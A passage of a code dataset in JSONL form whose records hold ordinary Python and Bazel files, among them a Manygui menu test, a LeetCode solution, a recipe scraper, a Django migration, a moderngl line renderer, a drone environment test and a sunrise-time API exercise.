For menu structures\n# that don't change much, this lets us build menus\n# without having to deal with every menu item proxy.\n# This works for checkboxes as well.\nlumbrJk = skitMenu.addCommand(text=\"Lumberjack\",command=chooseSkit)\n\nskitMenu.addSeparator()\n\n# Enable or disable skit silliness: a checkable menu item.\ndef enableSilly(ev):\n #print \"Enabling silly:\",enSilly.on\n # Enable or disable the silliness selection based\n # on the value of the enSilly menu item.\n if enSilly.on:\n # subMenu is defined below.\n subMenu.enabled=1\n else:\n subMenu.enabled=0\nenSilly = skitMenu.addCheck(text=\"Enable Silliness\",on=0,command=enableSilly)\n\n# A sub-menu to allow silliness level to be selected:\n# a mutually-exclusive set of checkable items (radio\n# items?)\nsubMenu = Menu(text=\"Silliness...\",enabled=0)\nsilliness = []\ndef handleSillySelect(ev):\n #print \"Handling silly select...\"\n # Enforce mutual exclusion of silliness level.\n for item in silliness:\n if item != ev.source:\n item.on=0\n else:\n item.on = 1\n\n# We can set the contents of a menu in one go, if we want,\n# instead of calling addThingy() a bunch of times.\nfor txt in [\"Slight\",\"Moderate\",\"Unbearable\"]:\n silliness.append(MenuCheck(text=txt,command=handleSillySelect))\n subMenu.add(silliness[-1])\n#subMenu.contents = silliness\nskitMenu.add(subMenu)\n\nskitMenu.addSeparator()\ndef addSkit(*args,**kws):\n cmd = skitMenu.addCommand(text=entry.text,index=0,command=chooseSkit)\naddCmd = skitMenu.addCommand(text=\"Add Skit\",command=addSkit)\n\n# And a menu for help...\nhelpMenu = Menu(text=\"Help\")\nhelpMenu.addCommand(text=\"About Manygui\")\nmbar.add(helpMenu)\n\nentry = TextField(text=\"Enter new skit\",selection=(0,15))\nwin.add(entry)\n\napp.add(win)\napp.run()\n","repo_name":"progval/Manygui","sub_path":"test/test_menu.py","file_name":"test_menu.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"43762421328","text":"class Solution:\n def maxSatisfied(self, customers: List[int], grumpy: List[int], X: int) -> int:\n maxx = 0\n rr = 0\n for a in range(len(grumpy)):\n if grumpy[a] == 0:\n rr += customers[a]\n\n for a in range(len(grumpy)):\n if grumpy[a] == 1:\n rr += customers[a]\n if a >= X and grumpy[a - X] == 1:\n rr -= customers[a - X]\n if rr > maxx:\n maxx = rr\n\n return maxx\n","repo_name":"itibbers/nb","sub_path":"leetcode/138/1052.py","file_name":"1052.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"16145861909","text":"from bs4 import BeautifulSoup\nfrom scrapy.http import HtmlResponse\nfrom scrapy.selector import Selector\nimport requests\nimport re\n\nrequete = requests.get(url=\" \")\npage = requete.content\nsoup = BeautifulSoup(page, \"html.parser\" )\nregex = re.compile(r'[\\n\\r\\t]')\n\nrecepette= soup.find(\"h1\", {\"class\": \"main-title\"}).string\npersonne = soup.find(\"span\", {\"class\": \"title-2 recipe-infos__quantity__value\"}).string\ntemp_preparation = soup.find(\"span\", {\"class\": \"recipe-infos__timmings__value\"}).get_text()\ntemp_cuisson = soup.find(\"span\", {\"class\": \"recipe-infos__timmings__value\"}).get_text()\nlist_ingredient = soup.find_all(\"span\", attrs={\"class\": \"ingredient\"})\nlist_utensil= soup.find_all(\"span\", attrs={\"class\": \"recipe-utensil__name\"})\netapes_preparation = soup.find_all(\"li\", attrs={\"class\": 
\"recipe-preparation__list__item\"})\n\ndef liste_utensil(list_utensil):\n liste=[]\n for i in list_utensil:\n liste.append(str(i.get_text()).strip())\n return liste\n\ndef liste_ingredient(list_ingredient):\n liste=[]\n for i in list_ingredient:\n liste.append(i.string)\n return liste\n\ndef listes_etapes(etapes_preparation):\n liste=[]\n for e in etapes_preparation:\n r=(e.get_text()).split('\t\t')\n liste.append({\"index\":r[0][7:],\"description\":regex.sub(\"\",r[1])})\n return liste\n\n\ndictionnaire ={\n \"nom_recette\" :recepette,\n \"nombre_personnes\" :personne,\n \"temps_preparation\" :regex.sub(\" \",temp_preparation).strip(),\n \"temps_cuisson\" : regex.sub(\" \",temp_cuisson).strip(),\n \"list_ingredient\" :liste_ingredient(list_ingredient),\n \"list_ustensiles\" : liste_utensil(list_utensil),\n \"etapes_preparation\" : listes_etapes(etapes_preparation)\n}\nprint( dictionnaire)\n","repo_name":"Adja-Fatou-Elisabeth/Cour_open_classrom","sub_path":"Scrapping_de_donne.py","file_name":"Scrapping_de_donne.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42841222761","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('cms', '0016_auto_20160608_1535'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='ContentBlockPluginModel',\n fields=[\n ('cmsplugin_ptr', models.OneToOneField(serialize=False, to='cms.CMSPlugin', primary_key=True, related_name='cms_content_blocks_contentblockpluginmodel', parent_link=True, auto_created=True)),\n ('title', models.CharField(verbose_name='Title', max_length=254)),\n ('slug', models.SlugField(verbose_name='Slug', max_length=254)),\n ('type', models.CharField(choices=[('cadet_blue', 'Cadet blue'), ('burlywood', 'Burlywood'), ('azure', 'Azure'), ('alice_blue', 'Alize blue'), ('corn_silk', 'Corn silk')], default='cadet_blue', verbose_name='Block type', max_length=254)),\n ],\n options={\n 'verbose_name': 'Content blok',\n 'verbose_name_plural': 'Content blocks',\n },\n bases=('cms.cmsplugin',),\n ),\n ]\n","repo_name":"gatsinski/kindergarten-management-system","sub_path":"kindergarten_management_system/kms/contrib/cms_content_blocks/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"19974086986","text":"\nimport moderngl\nimport numpy as np\n\nfrom ..io.voxels import read_binvox\nfrom .base import Renderable\n\n\nclass Lines(Renderable):\n \"\"\"A line is a collection of line segments with colors and a specific width.\n\n Arguments:\n ----------\n points: array-like, the points that compose the line segments.\n colors: array-like, per line-segment color as (r,g,b,a)\n width: float indicating the width of the line\n \"\"\"\n def __init__(self, points, colors=(0.3, 0.3, 0.3, 1.0), width=0.4):\n self._points = np.asarray(points)\n self._colors = np.asarray(colors)\n self._width = width\n\n N = len(self._points)\n if len(self._colors.shape) == 1:\n if self._colors.size == 3:\n self._colors = np.array(self._colors.tolist() + [1])\n self._colors = self._colors[np.newaxis].repeat(N, axis=0)\n elif self._colors.shape[1] == 3:\n self._colors = np.hstack([self._colors, np.ones((N, 1))])\n\n self._prog = None\n self._vbo = None\n self._vao = None\n\n def init(self, 
ctx):\n self._prog = ctx.program(\n vertex_shader=\"\"\"\n #version 330\n\n in vec3 in_vertex;\n in vec4 in_color;\n out vec4 v_color;\n\n void main() {\n v_color = in_color;\n gl_Position = vec4(in_vertex, 1);\n }\n \"\"\",\n geometry_shader=\"\"\"\n #version 330\n\n layout(lines) in;\n layout(triangle_strip, max_vertices=4) out;\n\n uniform float width;\n uniform mat4 vm;\n uniform mat4 mvp;\n in vec4 v_color[];\n out vec4 t_color;\n\n void main() {\n vec3 camera_position = vm[3].xyz / vm[3].w;\n vec3 first_v = gl_in[0].gl_Position.xyz;\n vec3 last_v = gl_in[1].gl_Position.xyz;\n\n vec3 ray_first = normalize(camera_position - first_v);\n vec3 ray_last = normalize(camera_position - last_v);\n vec3 line = normalize(last_v - first_v);\n vec3 offset_first = cross(ray_first, line)*width/2;\n vec3 offset_last = cross(ray_last, line)*width/2;\n\n gl_Position = mvp * vec4(first_v + offset_first, 1);\n t_color = v_color[0];\n EmitVertex();\n gl_Position = mvp * vec4(first_v - offset_first, 1);\n t_color = v_color[0];\n EmitVertex();\n gl_Position = mvp * vec4(last_v + offset_last, 1);\n t_color = v_color[1];\n EmitVertex();\n gl_Position = mvp * vec4(last_v - offset_last, 1);\n t_color = v_color[1];\n EmitVertex();\n\n EndPrimitive();\n }\n \"\"\",\n fragment_shader=\"\"\"\n #version 330\n\n in vec4 t_color;\n out vec4 f_color;\n\n void main() {\n f_color = t_color;\n }\n \"\"\"\n )\n self._vbo = ctx.buffer(\n np.hstack([self._points, self._colors]).astype(np.float32).tobytes()\n )\n self._vao = ctx.simple_vertex_array(\n self._prog,\n self._vbo,\n \"in_vertex\", \"in_color\"\n )\n\n def release(self):\n self._prog.release()\n self._vbo.release()\n self._vao.release()\n\n def render(self):\n self._vao.render(moderngl.LINES)\n\n def update_uniforms(self, uniforms):\n for k, v in uniforms:\n if k in [\"mvp\", \"vm\"]:\n self._prog[k].write(v.tobytes())\n self._prog[\"width\"].value = self._width\n\n @property\n def bbox(self):\n \"\"\"The axis aligned bounding box of all the vertices as two\n 3-dimensional arrays containing the minimum and maximum for each\n axis.\"\"\"\n return [\n self._points.min(axis=0),\n self._points.max(axis=0)\n ]\n\n def to_unit_cube(self):\n bbox = self.bbox\n dims = bbox[1] - bbox[0]\n self._points -= dims/2 + bbox[0]\n self._points /= dims.max()\n if self._vbo is not None:\n self._vbo.write(np.hstack([\n self._points, self._colors\n ]).astype(np.float32).tobytes())\n\n @classmethod\n def from_voxel_grid(cls, voxels, colors=(0.1, 0.1, 0.1), width=0.001,\n bbox=[[-0.5, -0.5, -0.5], [0.5, 0.5, 0.5]]):\n \"\"\"Create a voxel grid wire frame.\n\n Arguments\n ---------\n voxels: Array of 3D values, with truthy values indicating which\n voxels to fill\n \"\"\"\n # Make sure voxels, colors and bbox are arrays\n voxels, colors, bbox = list(map(np.asarray, [voxels, colors, bbox]))\n\n # Ensure that the voxel grid is indeed a 3D grid\n assert len(voxels.shape) == 3\n M, N, K = voxels.shape\n\n # Compute the size of each side\n sizes = 0.5 * (bbox[1] - bbox[0]) / [M, N, K]\n\n # Convert the indices to center coordinates\n x, y, z = np.indices((M, N, K)).astype(np.float32)\n x = x / M * (bbox[1][0] - bbox[0][0]) + bbox[0][0]\n y = y / N * (bbox[1][1] - bbox[0][1]) + bbox[0][1]\n z = z / K * (bbox[1][2] - bbox[0][2]) + bbox[0][2]\n centers = np.vstack([x[voxels], y[voxels], z[voxels]]).T\n\n # Create an array containing the cube edges\n edges = np.array([[-1, -1, -1], [ 1, -1, -1],\n [ 1, -1, -1], [ 1, 1, -1],\n [ 1, 1, -1], [-1, 1, -1],\n [-1, 1, -1], [-1, -1, -1],\n [-1, -1, 1], [ 
1, -1, 1],\n [ 1, -1, 1], [ 1, 1, 1],\n [ 1, 1, 1], [-1, 1, 1],\n [-1, 1, 1], [-1, -1, 1],\n [-1, -1, -1], [-1, -1, 1],\n [-1, 1, -1], [-1, 1, 1],\n [ 1, -1, -1], [ 1, -1, 1],\n [ 1, 1, -1], [ 1, 1, 1]]) * sizes\n\n # Finally create the edges of each cube\n points = centers[:, np.newaxis] + edges[np.newaxis]\n\n # Convert the colors to per edge color\n if len(colors.shape) == 1:\n colors = np.array([colors]*(points.size // 3))\n elif len(colors.shape) == 4:\n colors = colors[voxels]\n colors = np.repeat(colors, len(edges), axis=0)\n\n return cls(points.reshape(-1, 3), colors, width)\n\n @classmethod\n def from_binvox(cls, binvoxfile, colors=(0.1, 0.1, 0.1), width=0.001):\n \"\"\"Create a wireframe for voxel grid read from a binvox file.\n\n Arguments\n ---------\n binvoxfile: str or file object that contains the voxelgrid data in\n binvox format\n colors: The colors of the voxels to pass to from_voxel_grid().\n width: The width of the lines for the wireframe.\n \"\"\"\n voxelgrid, translation, scale = read_binvox(binvoxfile)\n bbox = np.array([[0., 0, 0], [1, 1, 1]]) * scale + translation\n\n return cls.from_voxel_grid(voxelgrid, colors=colors, bbox=bbox,\n width=width)\n\n @classmethod\n def axes(cls, origin=(0, 0, 0), size=1.0, colors=None, width=0.01):\n \"\"\"Create the three axes to be used as a reference.\n\n Arguments\n ---------\n origin: array-like (3,), the origin to put the axes to\n (default: (0, 0, 0))\n size: float or array-like (3,), the size of the axes lines\n (default: 1.)\n colors: None or array-like (3, 3 or 4), the colors to use for each\n of the three axes (default: None)\n width: float, the width of the lines (default: 0.01)\n \"\"\"\n # Normalize the colors argument\n colors = colors or [[0.8, 0.2, 0.2], [0.2, 0.8, 0.2], [0.2, 0.2, 0.8]]\n colors = np.asarray(colors)\n if len(colors.shape) == 1:\n colors = colors[None]\n if len(colors) == 1:\n colors = np.repeat(colors, 3, axis=0)\n elif len(colors) != 3:\n raise ValueError(\"colors should contain 1 or 3 colors\")\n if colors.shape[1] == 3:\n colors = np.hstack([colors, np.ones((3, 1))])\n elif colors.shape[1] != 4:\n raise ValueError(\"colors should be either 3 or 4 values\")\n colors = np.repeat(colors, 2, axis=0)\n assert colors.shape == (6, 4)\n\n # Normalize the size argument\n size = np.ones(3) * size\n assert size.shape == (3,)\n\n # Normalize the origin argument\n origin = np.asarray(origin)\n assert origin.shape == (3,)\n\n axes = np.array([[0, 0, 0],\n [1, 0, 0],\n [0, 0, 0],\n [0, 1, 0],\n [0, 0, 0],\n [0, 0, 1.]]) * size + origin\n\n return cls(axes, colors, width=width)\n","repo_name":"angeloskath/simple-3dviz","sub_path":"simple_3dviz/renderables/lines.py","file_name":"lines.py","file_ext":"py","file_size_in_byte":9243,"program_lang":"python","lang":"en","doc_type":"code","stars":115,"dataset":"github-code","pt":"21"} +{"seq_id":"37653848367","text":"# -*- python -*-\n\nload(\"@drake//tools/workspace:github.bzl\", \"github_archive\")\n\ndef fmt_repository(\n name,\n mirrors = None):\n github_archive(\n name = name,\n repository = \"fmtlib/fmt\",\n # When changing the fmt version, also update the URL in the file\n # overview docstring of drake/common/text_logging.h.\n commit = \"7.1.0\",\n sha256 = \"a53bce7e3b7ee8c7374723262a43356afff176b1684b86061748409e6f8b56c5\", # noqa\n build_file = \"@drake//tools/workspace/fmt:package.BUILD.bazel\",\n mirrors = mirrors,\n 
)\n","repo_name":"victoralad/drake","sub_path":"tools/workspace/fmt/repository.bzl","file_name":"repository.bzl","file_ext":"bzl","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73637332211","text":"import pygame\r\nfrom env import droneEnv\r\nenv = droneEnv()\r\n\r\n\r\nprint(\"\\n\\n\")\r\nprint(\"Observation space:\")\r\nprint(env.observation_space)\r\nprint(\"\")\r\nprint(\"Action space:\")\r\nprint(env.action_space)\r\nprint(\"\")\r\nprint(\"Action space sample:\")\r\nprint(env.action_space.sample(),\"\\n\\n\")\r\n\r\n\r\nepisode = 0\r\nwhile episode < 10:\r\n state = env.reset()\r\n done = False\r\n score = 0\r\n \r\n while not done:\r\n \r\n #env.render() # Step method already involves rendering\r\n pygame.time.delay(5)\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n quit()\r\n \r\n action = env.action_space.sample()\r\n n_state, reward, done, info = env.step(action)\r\n score += reward\r\n episode += 1\r\n print('Episode: {} Score: {}'.format(episode , score))\r\n\r\npygame.display.quit()\r\npygame.quit()","repo_name":"RsGoksel/Mechopter","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"42235491421","text":"import requests\r\nimport json\r\nfrom datetime import date, datetime\r\n\r\n# --- ISS --- #\r\n# response = requests.get(url=\"http://api.open-notify.org/iss-now.json\")\r\n\r\n# # if response.status_code == 404:\r\n# # raise Exception(\"Resource does not exist.\")\r\n# # elif response.status_code == 401:\r\n# # raise Exception(\"You are not authorized to access this data.\")\r\n\r\n# # instead of going over each HTTP codes\r\n# response.raise_for_status()\r\n\r\n# # get data from api\r\n# data = response.json()[\"iss_position\"]\r\n# longitude = data[\"longitude\"]\r\n# latitude = data[\"latitude\"]\r\n# print(longitude, latitude)\r\n\r\nMY_LAT = 51.507351\r\nMY_LONG = -0.127758\r\n\r\nparameters = {\r\n \"lat\": MY_LAT,\r\n \"lng\": MY_LONG,\r\n \"formatted\": 0, #24-hour clock\r\n}\r\n\r\nresponse = requests.get(\"https://api.sunrise-sunset.org/json\", params=parameters)\r\nresponse.raise_for_status()\r\ndata = response.json()\r\nsunrise = data[\"results\"][\"sunrise\"].split(\"T\")[1].split(\":\")[0]\r\nsunset = data[\"results\"][\"sunset\"].split(\"T\")[1].split(\":\")[0]\r\n\r\ntime_now = datetime.now()\r\n\r\nprint(sunrise, sunset)\r\nprint(time_now.hour)","repo_name":"maryletteroa/100DaysOfCode-Python","sub_path":"33/day_33_exercises.py","file_name":"day_33_exercises.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
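# --- Editor's sketch: the sunrise/sunset snippet above stops after printing
# the hours. A minimal follow-up, reusing its sunrise, sunset and time_now
# variables, could classify day vs night; note the API returns UTC times with
# formatted=0, so datetime.utcnow() would be the fairer comparison (assumption).
is_night = time_now.hour >= int(sunset) or time_now.hour < int(sunrise)
print("It is night." if is_night else "It is day.")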